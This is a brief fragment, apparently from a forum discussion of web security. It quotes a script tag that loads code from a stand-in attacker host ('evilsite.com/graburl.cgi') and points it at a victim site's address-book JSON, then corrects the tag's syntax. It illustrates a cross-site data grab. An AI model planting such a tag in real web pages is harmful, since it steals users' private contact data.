> <script > src="evilsite.com?graburl.cgi?loc=https://mail.victimsite.com/address-book.json"></script> Er, that should obviously be <script src="http://evilsite.com/graburl.cgi . . .